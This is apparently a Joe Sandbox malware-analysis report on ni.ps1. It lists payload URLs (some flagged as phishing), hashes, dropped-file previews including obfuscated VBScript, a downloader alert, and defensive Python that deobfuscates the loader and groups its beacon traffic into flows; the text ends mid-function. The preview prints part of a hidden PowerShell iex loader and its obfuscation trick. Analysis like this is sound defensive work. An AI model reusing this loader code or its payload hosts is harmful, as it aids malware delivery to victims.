                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.3388724978.00000263C074E000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.almrwad.com/wh/powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.2190793958.000001DAB793A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.3388724978.00000263C074E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.erp-royal-crown.info/wh/Sapowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: phishing
                                          unknown
                                          https://go.micropowershell.exe, 00000000.00000002.2327446000.0000023900C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2190793958.000001DAB8D46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2190793958.000001DAB8199000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2190793958.000001DAB7DBE000.00000004.00000800.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fornid.com/content/13-international-shipmentspowershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://crl.mXpowershell.exe, 00000003.00000002.2219212023.000001DACF81F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://contoso.com/Iconpowershell.exe, 00000007.00000002.3482512250.00000263D06D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.almrwad.powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000003.00000002.2190793958.000001DAB8D46000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://www.almrwad.compowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C11E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C195D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1684000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0B10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C14EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.fornid.compowershell.exe, 00000000.00000002.2327446000.0000023901632000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.jspowershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.jspowershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.3388724978.00000263C074E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.fornid.compowershell.exe, 00000000.00000002.2327446000.0000023901AFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.fornid.com/powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.fornid.com/cercapowershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.almrwad.com/wh/Saropowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.erp-royal-crown.info/powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: phishing
                                                    unknown
                                                    https://www.erp-royal-crown.infpowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://almrwad.compowershell.exe, 00000007.00000002.3388724978.00000263C0D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C11E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C195D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1684000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0B10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C14EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.fornid.com/144-filtri-per-mascherepowershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2327446000.0000023901B1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.almrwad.com/wh/Sapowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.2190793958.000001DAB793A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.almrwad.com/wh/Spowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.erp-royal-crown.info/wh/Sarothrumpowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: phishing
                                                      unknown
                                                      https://www.fornid.com/62-mascherine-protettive-ffp1-ffp2-ffp3powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2327446000.0000023901B1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.erp-royal-crown.info/wpowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: phishing
                                                      unknown
                                                      https://www.erp-royal-crown.info/wh/Spowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: phishing
                                                      unknown
                                                      https://www.pineappletech.aepowershell.exe, 00000000.00000002.2327446000.0000023901CA3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://aka.ms/pscore68powershell.exe, 00000000.00000002.2327446000.0000023900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2190793958.000001DAB7711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0521000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.almrwad.com/wh/Sarothrpowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://www.erp-royal-crown.powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://www.almrwad.com/wh/Sarothrum.powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://www.erp-royal-crown.info/wh/Sarothpowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        http://fornid.compowershell.exe, 00000000.00000002.2327446000.0000023901AFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://www.erp-royal-crown.info/whpowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: phishing
                                                        unknown
IP | Domain | Country | ASN | ASN Name | Malicious
91.193.42.13 | www.pineappletech.ae | Belgium | 48694 | ITFPL | false
93.95.216.175 | fornid.com | Italy | 52030 | SERVERPLAN-ASIT | true
148.251.114.233 | erp-royal-crown.info | Germany | 24940 | HETZNER-ASDE | false
184.171.244.231 | almrwad.com | United States | 33182 | DIMENOCUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1568993
Start date and time: 2024-12-05 10:37:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 0s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ni.ps1
Detection: MAL
Classification: mal100.expl.evad.winPS1@11/13@6/4
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 11
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .ps1
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 2956 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 4768 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7164 because it is empty
• Not all processes were analyzed; report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: ni.ps1
Time | Type | Description
04:38:08 | API Interceptor | 2079460x Sleep call for process: powershell.exe modified
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with very long lines (332), with CRLF line terminators
Category: dropped
Size (bytes): 29620
Entropy (8bit): 5.166723827328713
Encrypted: false
SSDEEP: 768:XYf48SKT1nPeL9GLfqAQnS710jlshl/cT7saN+:X04lKT1P0yfqAuRlsDQBN+
MD5: 23454878FB50859C4849AC2B6E256789
SHA1: C737B3D0F1DCC9AD4A590BA9916B8F9DFA9F0168
SHA-256: FF5B8F48D4F9C3FCED13466B68E9BD8722E2063A93BD781A5CCA3CD9C6864470
SHA-512: 3D318C9385C01286EAB9216A9AAFD7E3CB3D34C0E471E15F8904B7FA6CD9AA5C098FF9F6D29EA5362903CE3D217C0981BBB9120A34DC9DF7BACC391FF55311A6
Malicious: true
Reputation: low
Preview: ......Function Maculose242(Rektorat)......Publikummetbatfowl = Mid(MidB(Command, 44, 213),21,25)....Maculose242 = ChrW(Rektorat)....Opskreknivsplid = Command ......End Function ....elektroingenirerne = LenB("Sardinieren") ..elektroingenirerne = elektroingenirerne xor clng(6932161) ...... ..Diareernes = 0.... ..Backspier70= array(65+5+0,69,77,59,72,73,62,59,66,66)......Kopvisdislocatedavic = Log(Len("Frihedsbevgelserne"))....Private Const Kbesum = 49485..Private Const Cornbird = 16348..Private Const Nyderes = "Pandaer verificative133 knopskydning,"..Private Const Terrorize = "Postansvarlige skjorternes"..Private Const Danseorkesteret = "Myndigstes150 exculpate trykkeriers puromucous"..Private Const Unignorant = &HF76C..Private Const Iodinophilous = -9045..Private Const Polyautography = 22989..Private Const Divisibly = -6735..Private Const Takeups = &H8FE6..Private Const Inductance = &H59DF..Private Const Thorax64 = -13300..Private Const Forkiness = &H96C8..Private Const Kondensatore

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 11608
Entropy (8bit): 4.890472898059848
Encrypted: false
SSDEEP: 192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
MD5: 8A4B02D8A977CB929C05D4BC2942C5A9
SHA1: F9A6426CAF2E8C64202E86B07F1A461056626BEA
SHA-256: 624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
SHA-512: 38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
Malicious: false
Reputation: moderate, very likely benign file
Preview: PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:NlllulFyNXz:NllUI
MD5: 5F507BA3CB5E9028C7C7E403F7FC3AD0
SHA1: C7488724C1EDA08F547EAD55E44FBF66CF6CC65E
SHA-256: FB172939B33D5E25D69CBB9B572EC0C81B4ED99D21C5C4942C5223F6D5BD579E
SHA-512: A83C115A11A41AD3312C0CE029FD00146D12C900AAE00DCD82972DF541412D6F8142AC87C1501FF57615F892B81603D654FF341FEFD02A30AA8A329984096C85
Malicious: false
Preview: @...e...................................z............@..........

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):6222
                                                                  Entropy (8bit):3.70207152005108
                                                                  Encrypted:false
                                                                  SSDEEP:48:dCY5AGOCcbU2K+UDukvhkvklCywGn2k7GA/hlzFSogZolE7GA/hl+FSogZoh1:dLNOChoXkvhkvCCte7r/hmHX7r/hRH6
                                                                  MD5:3344C92923F5DE385F509748757E10F2
                                                                  SHA1:EADC78E12D199921036B474B87251519079F0629
                                                                  SHA-256:6830352E6428D9BE1C6EED36800D95DD0817342D8293CE83906F9D521E4660CB
                                                                  SHA-512:B9815968EB4E6D69376A4BB8CAF6F4544B26AF2B4F9F7F0C8C8CE2CDB07B604BE93C5843C7AE062F6709FC32E5922EA72FA0CD4D3EB8A947CFB7F07091272214
                                                                  Malicious:false
                                                                  Preview:...................................FL..................F.".. ...d.......l.b.F..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....1+.^.F.....c.F......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y.L....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Y.L..Roaming.@......DWSl.Y.L....C..................... ...R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.Y.L....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW#r..Windows.@......DWSl.Y.L....E.......................+.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.Y.L....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.Y.L....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.Y.L....q...........
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):6222
                                                                  Entropy (8bit):3.70207152005108
                                                                  Encrypted:false
                                                                  SSDEEP:48:dCY5AGOCcbU2K+UDukvhkvklCywGn2k7GA/hlzFSogZolE7GA/hl+FSogZoh1:dLNOChoXkvhkvCCte7r/hmHX7r/hRH6
                                                                  MD5:3344C92923F5DE385F509748757E10F2
                                                                  SHA1:EADC78E12D199921036B474B87251519079F0629
                                                                  SHA-256:6830352E6428D9BE1C6EED36800D95DD0817342D8293CE83906F9D521E4660CB
                                                                  SHA-512:B9815968EB4E6D69376A4BB8CAF6F4544B26AF2B4F9F7F0C8C8CE2CDB07B604BE93C5843C7AE062F6709FC32E5922EA72FA0CD4D3EB8A947CFB7F07091272214
                                                                  Malicious:false
                                                                  Preview:...................................FL..................F.".. ...d.......l.b.F..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....1+.^.F.....c.F......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y.L....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Y.L..Roaming.@......DWSl.Y.L....C..................... ...R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.Y.L....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW#r..Windows.@......DWSl.Y.L....E.......................+.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.Y.L....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.Y.L....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.Y.L....q...........
                                                                  File type:ASCII text, with very long lines (825), with no line terminators
                                                                  Entropy (8bit):5.387046106067881
                                                                  TrID:
                                                                    File name:ni.ps1
                                                                    File size:825 bytes
                                                                    MD5:bbaa2ede1a42e0a17b6a1b1ebc59eb07
                                                                    SHA1:eff8193f408c8f81eacbee310582b31ca4d9f014
                                                                    SHA256:077934deadb778ea2b87fad0bd565dd9bfb85c4c30604aaa5be014d305964466
                                                                    SHA512:a14df17279abafe5cdbaa7891723c6ecbdf6f3b367de32cfbab64f05757180b1a5eb33c0dfaf245a336e1b2f158d2558bd6b5df9ba9592aaf2309186f174874f
                                                                    SSDEEP:12:s8Z1ZCUZF2sreNCUZF+eDEWEjX4L7LCrRjQWgTThUlIeRQKz6mpVjWxoJ5zoXCuU:XLZLreZ0jWIXMLChQWAa6KzTi8zoXU
                                                                    TLSH:BA01468591821AF35152F5D110C0593F323BDE02B6D900F2B1B4429B20BCF3C0FC292B
                                                                    File Content Preview:powershell -win hidden $kg3s50=iex($('[Environment]::GetElz7s'''.Replace('lz7','nvironmentVariable(''public'') + ''\\z1rpb4.vb')));$flol=iex($('[Environment]::GetElz7s'''.Replace('lz7','nvironmentVariable(''public'') + ''\\eji.vb')));function getit([strin
                                                                    Icon Hash:3270d6baae77db44
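The File Content Preview above shows how ni.ps1 hides the paths it works with: each assignment is `iex($('<string>'.Replace('lz7', '<fragment>')))`, where the string `[Environment]::GetElz7s'` only becomes the real expression `[Environment]::GetEnvironmentVariable('public') + '\\z1rpb4.vbs'` after the `.Replace()` runs, and the closing `s` and quote of the original string supply the `.vbs` extension. The following Python is an added example, not code from the sample or from Joe Sandbox: it rebuilds each such string statically and, for the one expression shape it recognises (environment variable plus a literal), computes the path the script would use without executing anything. The value of PUBLIC is the Windows default and is an assumption about the analysis VM; the helper names are mine.

```python
"""Static resolution of the .Replace() obfuscation in ni.ps1's first line.

Added example for this report page; not the sample's code and not Joe Sandbox
code.  PUBLIC's value is the Windows default and is an assumption about the
sandbox; the helper names are mine.
"""
import ntpath
import re

# Copied from the report's File Content Preview (truncated there at '[strin').
SAMPLE_PREVIEW = (
    r"powershell -win hidden $kg3s50=iex($('[Environment]::GetElz7s'''.Replace('lz7',"
    r"'nvironmentVariable(''public'') + ''\\z1rpb4.vb')));"
    r"$flol=iex($('[Environment]::GetElz7s'''.Replace('lz7',"
    r"'nvironmentVariable(''public'') + ''\\eji.vb')));function getit([strin"
)

# Assumed environment of the analysis VM (Windows default for PUBLIC).
SANDBOX_ENV = {"public": r"C:\Users\Public"}

# A PowerShell single-quoted string: only '' is special inside it (an escaped quote).
PS_STR = r"'(?:[^']|'')*'"

# $var = iex( $( '<src>'.Replace('<old>', '<new>') ) )
ASSIGN_RE = re.compile(
    r"(?P<var>\$\w+)\s*=\s*iex\(\s*\$\(\s*(?P<src>" + PS_STR + r")"
    r"\s*\.Replace\(\s*(?P<old>" + PS_STR + r")\s*,\s*(?P<new>" + PS_STR + r")\s*\)"
    r"\s*\)\s*\)",
    re.IGNORECASE,
)

# The only rebuilt expression this code is willing to "evaluate":
# [Environment]::GetEnvironmentVariable('<name>') + '<literal>'
PATH_EXPR_RE = re.compile(
    r"^\[Environment\]::GetEnvironmentVariable\(\s*(?P<name>" + PS_STR + r")\s*\)"
    r"\s*\+\s*(?P<lit>" + PS_STR + r")$",
    re.IGNORECASE,
)


def unquote(ps_literal):
    """'it''s' -> it's  (strip the outer quotes, unescape doubled quotes)."""
    return ps_literal[1:-1].replace("''", "'")


def rebuild(src, old, new):
    """What the .Replace() call yields; String.Replace is ordinal, like str.replace."""
    return unquote(src).replace(unquote(old), unquote(new))


def resolve_path_expr(expr, env=SANDBOX_ENV):
    """Path for the GetEnvironmentVariable + literal shape; None for anything else."""
    m = PATH_EXPR_RE.match(expr)
    if not m:
        return None
    base = env.get(unquote(m["name"]).lower())   # env var names are case-insensitive
    if base is None:
        return None
    # The literal starts with '\\', so raw concatenation has a doubled separator;
    # Win32 tolerates that, and normpath shows the file that is actually opened.
    return ntpath.normpath(base + unquote(m["lit"]))


def deobfuscate(script, env=SANDBOX_ENV):
    """Map each $var assigned via iex(...Replace...) to (rebuilt expression, path)."""
    result = {}
    for m in ASSIGN_RE.finditer(script):
        expr = rebuild(m["src"], m["old"], m["new"])
        result[m["var"]] = (expr, resolve_path_expr(expr, env))
    return result


if __name__ == "__main__":
    for var, (expr, path) in deobfuscate(SAMPLE_PREVIEW).items():
        print(f"{var} = iex({expr!r})")
        print(f"{' ' * len(var)}   -> {path}")
```

Run stand-alone it reports that `$kg3s50` and `$flol` resolve to `C:\Users\Public\z1rpb4.vbs` and `C:\Users\Public\eji.vbs`, which matches the WScript and `%PUBLIC%` activity listed in the signatures at the top of the report; anything that is not the recognised expression shape comes back as None rather than being evaluated.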
Timestamp                       | SID     | Signature                                        | Severity | Source IP   | Source Port | Dest IP         | Dest Port | Protocol
2024-12-05T10:38:35.861453+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3        | 192.168.2.5 | 49745       | 148.251.114.233 | 443       | TCP
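The packet list that follows is raw per-packet rows, so the shape of the traffic is easier to see once the rows are folded into flows: two initial TLS connections (93.95.216.175, 91.193.42.13), then a new connection every six seconds or so, alternating between 148.251.114.233 and 184.171.244.231, with the ET alert above tied to client port 49745. The Python below is an added example, not Joe Sandbox code: it reads rows with the list's columns (Timestamp, Source Port, Dest Port, Source IP, Dest IP) as pipe-separated fields, groups them by client port and remote host, and derives the inter-connection interval and the flow the alert fired on. SAMPLE_ROWS is a constructed subset of the rows on this page (the first packet of each connection plus some packets of the 49745 connection); 192.168.2.5 is the sandbox client; the helper names and the ALERT dict layout are mine.

```python
"""Flow view of the report's TCP packet list (added example; not Joe Sandbox code).

SAMPLE_ROWS is a hand-picked subset of the rows on this page; 192.168.2.5 is the
sandbox client.  Helper names and the ALERT dict layout are mine.
"""
from collections import Counter, OrderedDict
from datetime import datetime

LOCAL_IP = "192.168.2.5"

SAMPLE_ROWS = """\
Dec 5, 2024 10:38:17.871217012 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:17.871287107 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:22.162107944 CET | 49711 | 443 | 192.168.2.5 | 91.193.42.13
Dec 5, 2024 10:38:27.716285944 CET | 49733 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:33.917514086 CET | 49745 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:35.315968037 CET | 443 | 49745 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:38:35.861381054 CET | 443 | 49745 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:38:35.862700939 CET | 49745 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:40.720509052 CET | 49765 | 443 | 192.168.2.5 | 184.171.244.231
Dec 5, 2024 10:38:46.447520971 CET | 49777 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:52.400861025 CET | 49793 | 443 | 192.168.2.5 | 184.171.244.231
Dec 5, 2024 10:38:58.216638088 CET | 49808 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:39:04.181821108 CET | 49820 | 443 | 192.168.2.5 | 184.171.244.231
"""

# Fields of the single ET alert row on this page.
ALERT = {"sid": 2803305, "src_port": 49745, "dst_ip": "148.251.114.233",
         "signature": "ETPRO MALWARE Common Downloader Header Pattern H"}


def parse_ts(ts):
    """'Dec 5, 2024 10:38:17.871217012 CET' -> datetime (ns truncated to us)."""
    base, frac = ts.rsplit(" ", 1)[0].split(".")
    dt = datetime.strptime(base, "%b %d, %Y %H:%M:%S")
    return dt.replace(microsecond=int(frac[:6].ljust(6, "0")))


def parse_rows(text, local_ip=LOCAL_IP):
    """Return (ts, local_port, remote_ip, remote_port, direction) per row."""
    pkts = []
    for line in text.strip().splitlines():
        ts, sport, dport, sip, dip = (f.strip() for f in line.split("|"))
        if sip == local_ip:
            pkts.append((parse_ts(ts), int(sport), dip, int(dport), "out"))
        elif dip == local_ip:
            pkts.append((parse_ts(ts), int(dport), sip, int(sport), "in"))
        else:
            raise ValueError(f"neither side is the sandbox: {line!r}")
    return pkts


def flows(pkts):
    """Group packets into (local_port, remote_ip) flows, in first-seen order."""
    fl = OrderedDict()
    for ts, lport, rip, rport, direction in pkts:
        f = fl.setdefault((lport, rip), {"rport": rport, "start": ts, "end": ts,
                                         "out": 0, "in": 0})
        f[direction] += 1
        f["start"], f["end"] = min(f["start"], ts), max(f["end"], ts)
    return fl


def flows_per_remote(fl):
    """How many separate connections each remote host received."""
    return dict(Counter(rip for _, rip in fl))


def beacon_intervals(fl):
    """Seconds between consecutive flow starts; a steady value is a beacon period."""
    starts = sorted(f["start"] for f in fl.values())
    return [round((b - a).total_seconds(), 1) for a, b in zip(starts, starts[1:])]


def flow_for_alert(alert, fl):
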